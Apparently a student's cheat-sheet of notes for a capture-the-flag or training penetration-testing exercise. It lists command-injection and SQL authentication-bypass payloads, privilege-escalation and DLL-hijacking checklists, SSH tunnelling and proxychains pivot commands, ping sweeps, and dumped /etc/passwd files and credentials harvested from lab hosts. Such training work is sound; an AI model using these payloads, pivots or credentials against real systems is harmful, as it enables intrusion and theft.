CTFD Server: 10.50.22.148:8000
Attack and kill the enemy by fire and manuever: 10.50.27.48


Every Question is 5 points, do not waste time.
RTFFQPassword
Hijacking last
Buffer Overflow last

ping
nmap --script=http.enum
netcat
Step2 - Webpage
Click the links

atempt injection: ; <command>
If injection is working then upload ssh keys
cat /etc/hosts
cat /etc/passwd

SQL authentication bypass:
Username: 'Or 1='1
Password: 'Or 1='1

POST:
f12
input something
network
click on POST->request
click on raw
put that bitch in there

GET
Identify vulnerable fields
Identify number of columns
Modify Golden Statement

Make a graphical representation of the database (This is an example):
Siteusers
    Customer
           ID
           NAME
           ACCOUNT
    Net_products
           ID
           Quantity




Windows logs command (requires admin)
auditpol
Check home directories

Linux
crontab
ps -elf                   <-following parent PID is important at some point
top
htop
sudo -l
ps -elf
netstat -ant
SUID/GUID bits
Check home directories

Binary analysis/Reverse Engineering
strings the application
Open Ghidra
search for a good string
Logic and reasoning till victory


dll hijacking/ .exe hijacking
You don't have to build the script, just replace the old thing with a provided script
registries
schtasks
descriptions in services

Buffer Overflow
refer to main notes
make sure to do everything from the box you intend to exploit
gdb dissass functions can be in functions
proxychains nmap --script=http-enum.nse 192.168.28.100



root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:p2352dW98EWJ8qLiyzPI:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash openupthedoor:x:1001:1001::/home/openupthedoor:/bin/bash

openupthedoor:x:1001:1001::/home/openupthedoor:/bin/bash
/etc/hosts is empty

openupthedoor:B12c3b34f
192.168.28.30
Defense_Nix1: 192.168.28.177 <- ssh           
192.168.28.182 <- web server and ssh
login
robots.txt
images
Onlinetools

Array ( [0] => Msmith [name] => Msmith [1] => Squanchy [password] => Squanchy ) 1Array ( [0] => Fpalic [name] => Fpalic [1] => Birdperson [password] => Birdperson ) 1Array ( [0] => Kmichae [name] => Kmichae [1] => MrMeeseeks [password] => MrMeeseeks ) 1
Msmith:Squanchy
Fpalic:Birdperson   <- creds for Defense_Nix1 USE XARGS FOR PRIV ESCALATION              SCRIPT is /bin/SecurityOnion
Kmichae:MrMeeseeks
Rsanch:


Commands used for first security map

Device 2 /etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false 
-----------------------------------------------------------------------------------------------------------------------------------------
ssh -MS /tmp/jump student@10.50.27.48
for i in {1..30}; do (ping -c 1 192.168.28.$i | grep "bytes from" &) ; done
ssh -S /tmp/jump jump -O forward -D9050
Proxychains ss -ntlp
Proxychains nmap <ips>
Verify all ports with Proxychains nc
ssh -S /tmp/jump jump -O forward -L1111:192.168.28.100:80 -L2222:192.168.28.100:2222 -L3333:192.168.28.111:80 -L5555:192.168.28.111:2222
ssh -MS /tmp/t1 <creds>@127.0.0.1 -p<tunnel to first ssh target>
for i in {1..254}; do (ping -c 1 172.16.82.$i | grep "bytes from" &) ; done
ssh -S /tmp/jump jump -O cancel -D9050
ssh -S /tmp/t1 t1 -O forward -D9050
proxychains nmap <ips>
proxychains nc <ip> <port>
ssh -S /tmp/t1 t1 -O forward -L 2323:192.168.150.253:3201 -L4567:100.200.25.35:80
proxychains nmap --script=http-enum.nse 192.168.28.100

Math
______________________________________________________________________________________________________________________________________________________________________________________________
If x >> 4 = 32              <- Its a bit shift this would evaluate true if it is 512
       
  1    0  0    0  1  0 0 0 0 0
512  256  128 64 32 16 8 4 2 1
